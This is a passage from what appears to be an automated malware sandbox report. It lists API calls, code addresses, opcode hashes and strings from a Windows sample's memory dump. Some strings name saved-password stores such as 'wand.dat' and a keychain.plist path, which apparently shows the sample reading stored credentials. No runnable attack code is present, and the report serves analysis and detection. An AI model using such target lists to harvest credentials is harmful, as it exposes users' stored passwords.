                                                                                                                                                                  • Instruction Fuzzy Hash: 1C518E71D00119EFDB10DF98C491AAFB7B5EF48318F20819BD945AB205E738AA45CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00404B07
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                    • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                    • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                    • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                    • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                    • Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
                                                                                                                                                                    • Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
                                                                                                                                                                    • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
                                                                                                                                                                    • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
                                                                                                                                                                    • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
                                                                                                                                                                    • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81
                                                                                                                                                                    • Part of subcall function 004088A0: GetOpenFileNameW.COMDLG32(?), ref: 004088E9
                                                                                                                                                                    • Part of subcall function 004088A0: wcscpy.MSVCRT ref: 004088F7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                                                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                                                                                  • API String ID: 3589925243-1828844352
                                                                                                                                                                  • Opcode ID: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
                                                                                                                                                                  • Instruction ID: 189ab15ad594b46ceda1379ae2a6b1c5413d0dce04db73f13dfcb8633a17526e
                                                                                                                                                                  • Opcode Fuzzy Hash: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
                                                                                                                                                                  • Instruction Fuzzy Hash: 0841B771600205AFEF10EF61DD86ADE77B5FF40314F10802BFA05A71D2EB79A9958B98
                                                                                                                                                                  Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
  • Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB
• wcslen.MSVCRT ref: 0040E4B0
• _wtoi.MSVCRT ref: 0040E4BC
• _wcsicmp.MSVCRT ref: 0040E50A
• _wcsicmp.MSVCRT ref: 0040E51B
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
• Opcode ID: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
• Instruction ID: a8ded69f91e0d7bf63f89fae3ec1b4bc8203dfd4cc2a8694f23455ab63246b5f
• Opcode Fuzzy Hash: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
• Instruction Fuzzy Hash: 06417131900204EFCF21DF9AC980A99B7B5EF48358F1548BAEC05EB396E738DA509B55
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpymemsetstrlen
• String ID: Ap@$Ap@
• API String ID: 160209724-724177859
• Opcode ID: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
• Instruction ID: e2bdeeadc1d90758f2de231e66b6cadccfeb655152d102dc9dd3295dcddd65f9
• Opcode Fuzzy Hash: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
• Instruction Fuzzy Hash: 10313371A042069BDB14DFA8AC80BAFB7B89F04310F1100BEE916F72C1DB78DA518769
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040F882
  • Part of subcall function 004087A4: ShellExecuteW.SHELL32(?,open,?,Function_0004552C,Function_0004552C,00000005), ref: 004087BA
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040F8F2
• GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 0040F90C
• GetKeyState.USER32(00000010), ref: 0040F938
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
• Opcode ID: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
• Instruction ID: 0cce36cd3d59050ebbb4ae1468268e07e9567f629d0a6bc52b2b72a07dc00bda
• Opcode Fuzzy Hash: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
• Instruction Fuzzy Hash: 7041C375500305EBDB30AF15CC88B9673B4EF50325F10857AE9686BAE2C7B8AD89CB14
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpy$free
• String ID: Z6@
• API String ID: 2888793982-1638572689
• Opcode ID: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
• Instruction ID: 1cd3d00781b25d2b94616f77ccd2c248328d95a28ed1044bfffefbc926401994
• Opcode Fuzzy Hash: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
• Instruction Fuzzy Hash: EB219034500605EFCB60DF29C98185ABBF6FF84314720467EE852E3790E739EE019B44
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
• Instruction ID: 2b976a00fcfd181f23c33ae21356c60783d23841694cc8dee0d8ac2aa3eeffc6
• Opcode Fuzzy Hash: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
• Instruction Fuzzy Hash: EA112BB29003057BDB249F15D884DEA77A9EBA0344700062FFD0696251F6BDDED9C7D8
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
• Opcode ID: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
• Instruction ID: d0afff18851916bdc62762cc26ce26f97abfa6c0527030a4abc257fe2447681f
• Opcode Fuzzy Hash: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
• Instruction Fuzzy Hash: 2F114F712046019FE328DF1DC881A27F7E5EFD9304B21892EE59A97386DB39E802CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00413DA4
  • Part of subcall function 004089E1: _snwprintf.MSVCRT ref: 00408A26
  • Part of subcall function 004089E1: memcpy.MSVCRT ref: 00408A36
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00413DCD
• memset.MSVCRT ref: 00413DD7
• GetPrivateProfileStringW.KERNEL32(?,?,Function_0004552C,?,00002000,?), ref: 00413DF9
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
• String ID:
• API String ID: 1127616056-0
• Opcode ID: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
• Instruction ID: e0c1f09ad2cb5d60bcfcc92858fd4079171207d9a16d9363f081e68af551c4db
• Opcode Fuzzy Hash: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
• Instruction Fuzzy Hash: 4D1165B2500129BFEF11AF64DC06EDE7B79EF44711F10006AFB05B2151EA359A608F9D
Uniqueness

Uniqueness Score: -1.00%

APIs
• SHGetMalloc.SHELL32(?), ref: 004146C4
• SHBrowseForFolderW.SHELL32(?), ref: 004146F6
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0041470A
• wcscpy.MSVCRT ref: 0041471D
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: BrowseFolderFromListMallocPathwcscpy
• String ID:
• API String ID: 3917621476-0
• Opcode ID: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
• Instruction ID: 097f193ff7923ae7587a5e446372f032271e9f174675921af37de08819f90ac7
• Opcode Fuzzy Hash: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
• Instruction Fuzzy Hash: EC11FAB5900208AFDB00DFA9D988AEEB7FCFB49304F10406AE515E7240D738DB45CB64
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpy$memset
• String ID: sqlite_master
• API String ID: 438689982-3163232059
• Opcode ID: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
• Instruction ID: df29f02e372fce164f73cef38905b10b73feda933693282389fd2907aeed520f
• Opcode Fuzzy Hash: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
• Instruction Fuzzy Hash: 8B01F572900618BAEB11BBA0CC42FDEB77DFF45315F50005AF60062042DB79AA148B98
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
  • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
  • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
• _snwprintf.MSVCRT ref: 0040E81D
• SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040E882
  • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
  • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
  • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
• _snwprintf.MSVCRT ref: 0040E848
• wcscat.MSVCRT ref: 0040E85B
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
• String ID:
• API String ID: 822687973-0
• Opcode ID: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
• Instruction ID: fc9a9cbfa579f1f3c21001c0e8c570231a458ca756af8d40dec707b0d2905b79
• Opcode Fuzzy Hash: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
                                                                                                                                                                  • Instruction Fuzzy Hash: 540188B650070466F720F7A6DC86FAB73ACDB80704F14047AB719F21C2D679A9514A6D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76D25970,?,00416E7A,?), ref: 00416D6D
                                                                                                                                                                  • malloc.MSVCRT ref: 00416D74
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76D25970,?,00416E7A,?), ref: 00416D93
                                                                                                                                                                  • free.MSVCRT(00000000,?,76D25970,?,00416E7A,?), ref: 00416D9A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2605342592-0
                                                                                                                                                                  • Opcode ID: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
                                                                                                                                                                  • Instruction ID: bcab52b9ccbc4c9bc02d63d2584d5636d902a6cb4a382b6ea3df8204de1a5a00
                                                                                                                                                                  • Opcode Fuzzy Hash: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF089B260E22D7F7B102A75ACC0D7BBB9CDB862FDB21072FF514A1190D9199C015675
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32 ref: 004081F8
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00408210
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00408226
                                                                                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00408249
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Item
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3888421826-0
                                                                                                                                                                  • Opcode ID: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
                                                                                                                                                                  • Instruction ID: eb915db23c4b1ca38ea3c1988d88bb83aba39799d6a265b66449fd7df9afb7a9
                                                                                                                                                                  • Opcode Fuzzy Hash: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
                                                                                                                                                                  • Instruction Fuzzy Hash: 10F06975A0050CBFDB018F948E81CAFBBB9EB49784B2000BAF504E6150D6709E01AA61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00417496
                                                                                                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004174B6
                                                                                                                                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004174C2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004174D0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3727323765-0
                                                                                                                                                                  • Opcode ID: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
                                                                                                                                                                  • Instruction ID: 68256e963451342af1775745e88af25fe573ff9f394a0ba2c0bbd214266e5fb2
                                                                                                                                                                  • Opcode Fuzzy Hash: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7701F435504608BFDB219FA0DC84D9B7FBCFB80705F20843AF942D6050D6349984CB74
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00401C64
                                                                                                                                                                    • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                  • wcslen.MSVCRT ref: 00401C7D
                                                                                                                                                                  • wcslen.MSVCRT ref: 00401C8B
                                                                                                                                                                    • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
                                                                                                                                                                  • String ID: Apple Computer\Preferences\keychain.plist
                                                                                                                                                                  • API String ID: 3183857889-296063946
                                                                                                                                                                  • Opcode ID: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
                                                                                                                                                                  • Instruction ID: eecd7d3c3de4f02ea7dbe6204318003872b6068ab845989257e2c34d03a92ed5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
                                                                                                                                                                  • Instruction Fuzzy Hash: 08F0F9B250531866FB20A755DC8AFDA73AC9F01314F2001B7E914E20C3FB7CD944469D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040CF1E
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00445ADC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040CF37
                                                                                                                                                                  • strlen.MSVCRT ref: 0040CF49
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040CF5A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                  • Opcode ID: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
                                                                                                                                                                  • Instruction ID: 14800c8a4aa59548f5ab429dc5ca7c2185fd5422b2c87da3b8dfa48c6c6ad4f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
                                                                                                                                                                  • Instruction Fuzzy Hash: 13F01DB780122CBFFB059B94DCC9EEB776CDB09254F0001A6B709E2052DA749E448BB8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040CEAF
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040CECC
                                                                                                                                                                  • strlen.MSVCRT ref: 0040CEDE
                                                                                                                                                                  • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040CEEF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                  • Opcode ID: 9c577301d423554223bdd3630099943bbc335e058c45f1b75860cbc1b2ab4647
                                                                                                                                                                  • Instruction ID: 5ca945b9895027beb3426ea3ebb999d168a71141a618eb4a8136c4c05ef02c5a
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c577301d423554223bdd3630099943bbc335e058c45f1b75860cbc1b2ab4647
                                                                                                                                                                  • Instruction Fuzzy Hash: 40F062B680152C7FEB81A794DC81EEB776CEB05258F0041B2B749D2041DD349E084F7C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040840D: memset.MSVCRT ref: 0040842C
                                                                                                                                                                    • Part of subcall function 0040840D: GetClassNameW.USER32 ref: 00408443
                                                                                                                                                                    • Part of subcall function 0040840D: _wcsicmp.MSVCRT ref: 00408455
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00413A7C
                                                                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 00413A8A
                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00413A98
                                                                                                                                                                  • GetStockObject.GDI32(00000000), ref: 00413AA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 764393265-0
                                                                                                                                                                  • Opcode ID: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
                                                                                                                                                                  • Instruction ID: 110bd5b637e4d79b17592fdcf208372bccb43cad252910099e33a416a39d1a4b
                                                                                                                                                                  • Opcode Fuzzy Hash: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0C839100208BBCF216F60DC05ACE3F21AF05362F104136F914541F2CB759A90DB4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408D2C
                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 00408D3C
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00408D4B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 979780441-0
                                                                                                                                                                  • Opcode ID: d8f3a09722eadbc74da9c95b8a3510df0f65f7c1f1d0afca8fe4e111664d8614
                                                                                                                                                                  • Instruction ID: ec3377692345dfa8f7b5f00acb1c953adbf394747b85e28386a557f9ea6599fc
                                                                                                                                                                  • Opcode Fuzzy Hash: d8f3a09722eadbc74da9c95b8a3510df0f65f7c1f1d0afca8fe4e111664d8614
                                                                                                                                                                  • Instruction Fuzzy Hash: F4F05E769005199BEF119BA0DC49BBFB3FCBF1670AF008529E052E1090DB74D0048B64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memcpy.MSVCRT ref: 004116CC
                                                                                                                                                                  • memcpy.MSVCRT ref: 004116DE
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004116F1
                                                                                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000113C8,00000000), ref: 00411705
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1386444988-0
                                                                                                                                                                  • Opcode ID: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
                                                                                                                                                                  • Instruction ID: a5b74f8db5ede7a3d830d9ef30c1a68d0a9fd07d2d047c5f1f3455979569a65d
                                                                                                                                                                  • Opcode Fuzzy Hash: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF08231680710BBE751AF68BC06F467A90A786B93F200427F700A51E2D2F98591CB9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404C44
                                                                                                                                                                    • Part of subcall function 0041473D: LoadLibraryW.KERNEL32(shlwapi.dll,73FB48C0,?,00404C4C,00000000), ref: 00414746
                                                                                                                                                                    • Part of subcall function 0041473D: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
                                                                                                                                                                    • Part of subcall function 0041473D: FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404C56
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404C68
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404C7A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$Library$AddressFreeLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2406072140-0
                                                                                                                                                                  • Opcode ID: da5f3edd2f60ef32041746d78debef195ee365f8658758de0d32d5ce3718fae6
                                                                                                                                                                  • Instruction ID: 228af19f1fcbab99cdef25afc198749965fa335a60b9bcf03d324973c33eddf9
                                                                                                                                                                  • Opcode Fuzzy Hash: da5f3edd2f60ef32041746d78debef195ee365f8658758de0d32d5ce3718fae6
                                                                                                                                                                  • Instruction Fuzzy Hash: C1F01CB54047016BDA313F72CC09D5BBAADEFC1318F020D3EB1A1661E1CBBD94428A58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040CFDA
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040CFE8
                                                                                                                                                                    • Part of subcall function 00408FA6: wcslen.MSVCRT ref: 00408FC2
                                                                                                                                                                    • Part of subcall function 00408FA6: memcpy.MSVCRT ref: 00408FE5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                                                                  • String ID: "
                                                                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                                                                  • Opcode ID: 10fcbf9e5481758e0dfe22ca6cc4b0137c7973d9f08c313bebbe16306d28857a
                                                                                                                                                                  • Instruction ID: cb92cf76e860540842cf0149dc84745c0fdf0d5674f0ab6313b6b46cd67416c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 10fcbf9e5481758e0dfe22ca6cc4b0137c7973d9f08c313bebbe16306d28857a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5331B371904104EFDF10EFA5D8419EEB7B5EF44328F20416FE854B71C2DB7C9A468A58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpywcschr
                                                                                                                                                                  • String ID: ZD
                                                                                                                                                                  • API String ID: 2424118378-3587482827
                                                                                                                                                                  • Opcode ID: cab20acd61bf2aeda623c70c5b61bfb8dcf6f4394f0840f81abff6233d4b2f5c
                                                                                                                                                                  • Instruction ID: bc5ff3c8a32915e0c271f67cda952c5327785ed0a9ceb032124e0645629a4555
                                                                                                                                                                  • Opcode Fuzzy Hash: cab20acd61bf2aeda623c70c5b61bfb8dcf6f4394f0840f81abff6233d4b2f5c
